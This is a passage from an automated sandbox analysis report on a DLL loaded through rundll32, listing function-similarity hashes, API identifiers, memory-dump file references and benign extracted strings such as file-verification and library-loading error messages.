      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID: e+000$gfff
      • API String ID: 0-3030954782
      • Opcode ID: a0b4a98d576a10a6e3a0da15dd5e8e4746293ad3541659e3aa334c552677f52b
      • Instruction ID: f6e58dc7970a1d26dd0adf9c08be4621f1eb0c8160bce8016cb9768a45f6ae82
      • Opcode Fuzzy Hash: a0b4a98d576a10a6e3a0da15dd5e8e4746293ad3541659e3aa334c552677f52b
      • Instruction Fuzzy Hash: D6517AB27146CC46E7A6CE35A808799BB91E35CBA4F49D221CBA44BAC5CF39C649C700
      APIs
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: ErrorLast
      • String ID:
      • API String ID: 1452528299-0
      • Opcode ID: 32ae0cb38b3b69d83d12af6681f0a3ce2392bd4ef5a70b5fea58a58a172fff2d
      • Instruction ID: ecb3a429b116fcf64368373afd7e3ac527559c729b42e18b68529803189b8f9e
      • Opcode Fuzzy Hash: 32ae0cb38b3b69d83d12af6681f0a3ce2392bd4ef5a70b5fea58a58a172fff2d
      • Instruction Fuzzy Hash: 1DD1C3B260478886E7F6DF25E0483A97B90F78D7A4F54C225DB8947B95DF7CC6488B00
      APIs
      • EnumSystemLocalesW.KERNEL32(?,?,00000000,00000001801301F7,?,?,?,?,?,?,?,?,00000000,0000000180138A00), ref: 000000018012FDF7
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: EnumLocalesSystem
      • String ID:
      • API String ID: 2099609381-0
      • Opcode ID: 7a83e8bc964b767d18a3dccc9881b21e24547f6a8c854c59aa3a223554baed0a
      • Instruction ID: 02696fc78f1fcaa263e9141234fab4a06aa5e1d6719a252db0625d7baa23e7be
      • Opcode Fuzzy Hash: 7a83e8bc964b767d18a3dccc9881b21e24547f6a8c854c59aa3a223554baed0a
      • Instruction Fuzzy Hash: B4F03CB2300B4887E785DB29E8983DA7367F79CBC0F94D029EA4983765DE78C6598300
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID: gfffffff
      • API String ID: 0-1523873471
      • Opcode ID: 3c05b74dc7d3b59526d61f6f1df35647b34b7f0f29bb2ff571977b3eaa776d9e
      • Instruction ID: 0ad7334c65485f9f62971b9ca8978406d82dbfa592b7c05e8838b2e1b4e3bdfb
      • Opcode Fuzzy Hash: 3c05b74dc7d3b59526d61f6f1df35647b34b7f0f29bb2ff571977b3eaa776d9e
      • Instruction Fuzzy Hash: 39A145B37057CC86EBA6CB29A4147EA7B90E359BE4F05C122DF8947795EA3DC609C700
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID: 0-3916222277
      • Opcode ID: 8e8e8880b988a86fe12b3d04fec3431f0dcfae1117074ff7f9f921cd0f14eac8
      • Instruction ID: 92ca1c19978f7e98e1dc79a382196f8d49c5b8aae83ff91a3c9d075087d87231
      • Opcode Fuzzy Hash: 8e8e8880b988a86fe12b3d04fec3431f0dcfae1117074ff7f9f921cd0f14eac8
      • Instruction Fuzzy Hash: 7AB1A172105F5886EBAA8F29C0983EC3BA0F74DB68F28E116CB4A47395CF31C659C755
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
      • Instruction ID: b266238800c3099d4c7d16965a207078b382afbec0b3959330b3dbe103fe048b
      • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
      • Instruction Fuzzy Hash: D2518236320E5882E7AA8B29C04839C37B1F74DB78F24A111DE5917B98CB36DA57D740
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
      • Instruction ID: 03f34c0eb881ddf5f502b3628062a6a47f64f1b8239020765bd4c6c594425803
      • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
      • Instruction Fuzzy Hash: 37518076314E5886E7AA8F29D04839D37B1E74CF78F24A111CE4917BA8DB36DA47C780
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
      • Instruction ID: c90048feb344b5a07ce75a192268b1176897b3dbb599d5942664696d53f56c25
      • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
      • Instruction Fuzzy Hash: 77517F36710E5886E7AA8B29D04C39837B1E34DB78F24A111CE4917BE8CB36DA47C780
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: bf36178eee3e05a9df7ae4174492d72a955a1e5a924f83978aff5b384c443cef
      • Instruction ID: cc2829d54de1894aea31ff42c54a9275b60a420315146979c47b57ee77199df6
      • Opcode Fuzzy Hash: bf36178eee3e05a9df7ae4174492d72a955a1e5a924f83978aff5b384c443cef
      • Instruction Fuzzy Hash: FA517F36320E5886E7AA8B29D05839C77B0E74CB7CF28E111CE4917B95DB36CA5BC740
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: CreateErrorFileLast
      • String ID: %ws verification status - %x - IsMbam = %u$D:\Jenkins\workspace\N_MBCommon-vs2022\src\mbcommon\FileVerify.cpp$Error allocating memory for file data$File Not Found - %x$File Size Error$MbCommonSigVerify$Read file Error$VerifyFile$VerifyFile attempting to open %ws
      • API String ID: 1214770103-1110068639
      • Opcode ID: 307ac1770580ba3d592c58be44ea0f0f5cd9a0c4409d3336b534dacfa44d8c4d
      • Instruction ID: 11652f6c9eee8c16f10a3420f6e9143ef996b92be0c75af00192d30ce4594539
      • Opcode Fuzzy Hash: 307ac1770580ba3d592c58be44ea0f0f5cd9a0c4409d3336b534dacfa44d8c4d
      • Instruction Fuzzy Hash: 7B815C76204B8886E7A1CB11E84479E77A4F78DBE4F408115EA9D47BA6DF3CC608CB00
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID: \\.\Globalroot
      • API String ID: 3668304517-3084389310
      • Opcode ID: c1c51882aed7f50c725de7d56c11ff9d4f12b11390d09ca5d81619b85898036f
      • Instruction ID: 63d7ba85a87c813fe84413dbf665f9926105d667c37b972e7311ef1f595220e1
      • Opcode Fuzzy Hash: c1c51882aed7f50c725de7d56c11ff9d4f12b11390d09ca5d81619b85898036f
      • Instruction Fuzzy Hash: BD418472B11E4985FF47EB78D0493ED12229B8D7F4F40AB01BA6816AEADE65C249C340
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn$EventFileInfoResetVersion$LibraryLoadMultipleMutexObjectsQueryReleaseSizeValueWait
      • String ID: D:\Jenkins\workspace\N_MBCommon-vs2022\src\mbcommon\DynamicLibrary.cpp$Failed to load '%s', %s$Failed to load function ptrs for '%s'$File version %u.%u.%u.%u for '%s'$mb::common::system::DynamicLibrary::Load
      • API String ID: 4026781392-3082813674
      • Opcode ID: b1015c23e17ff9f6e18201f766be76b5944456af77c8d30d255385afce82add6
      • Instruction ID: cbabf07e28f1668f3db32a59947f7a559444b3bbfa617106ad4ec1bbbac74f0c
      • Opcode Fuzzy Hash: b1015c23e17ff9f6e18201f766be76b5944456af77c8d30d255385afce82add6
      • Instruction Fuzzy Hash: 14D1CD72B10B4895EB91DF65E4843EC33B1F798BD8F008616EA5D17AA9DF38C699C340
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID: \\?\
      • API String ID: 3668304517-4282027825
      • Opcode ID: c153c970744e3ff2ac1a733991df761227dc1e397997b5b26c4c23c3766a7f33
      • Instruction ID: 63a2ac9ff495613dcd4add744bea60c538b8f00e60c4357e3b1501531ff59648
      • Opcode Fuzzy Hash: c153c970744e3ff2ac1a733991df761227dc1e397997b5b26c4c23c3766a7f33
      • Instruction Fuzzy Hash: 3951B672B11F4985FF46DB78D0493EC23629B8D7F4F40D701AA6C16AEADE65C289C380
      APIs
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID:
      • API String ID: 3668304517-0
      • Opcode ID: 1aceb5f987f3b3742d416ac2d6fb94983d95fa97e2ad7047d90991908b41cd68
      • Instruction ID: 37caab9f01e1003b77e7c8090618f661dfee8657723bdb68d57d04bec796e96a
      • Opcode Fuzzy Hash: 1aceb5f987f3b3742d416ac2d6fb94983d95fa97e2ad7047d90991908b41cd68
      • Instruction Fuzzy Hash: 08618272B11E4985FF46DB78C0493ED13229B8D7F8F409B01BA6C1A6EADE65C289C340
      APIs
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: Value$ErrorLast$Heap$AllocateFree
      • String ID:
      • API String ID: 3174826731-0
      • Opcode ID: 8ccb908dd8e4ff57505e64b5df28a089de3b94dea4da7d119cfdfabe832b7545
      • Instruction ID: 525182d9fe85fdeaa0cb1f2338849a7f9d30ddb055702e12c3b71842699ac447
      • Opcode Fuzzy Hash: 8ccb908dd8e4ff57505e64b5df28a089de3b94dea4da7d119cfdfabe832b7545
      • Instruction Fuzzy Hash: 3D41537030120C47FAEBE7B1699D3EA63835B4C7B0F94D724A9364B6D6ED68D6498300
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn$AddressProc
      • String ID: Could not load '%s' function ptr from DLL because DLL is not loaded$Could not load '%s' function ptr from DLL, %s$D:\Jenkins\workspace\N_MBCommon-vs2022\src\mbcommon\DynamicLibrary.cpp$mb::common::system::DynamicLibrary::GetFunctionAddress
      • API String ID: 1230731272-560569770
      • Opcode ID: 1fef4f74c05ee2d78553d6c1d76f499fa895c5e38613afa3b0117b4ca4a0fd19
      • Instruction ID: 2d62702eddbb558de309e16dbec1e386c5a102024c7951b4589988eaaaf8c99c
      • Opcode Fuzzy Hash: 1fef4f74c05ee2d78553d6c1d76f499fa895c5e38613afa3b0117b4ca4a0fd19
      • Instruction Fuzzy Hash: 24A17F72B11B4895EB91DB69D4543ED33A1FB487E8F40D612EAAC07A99DF39C689C300
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
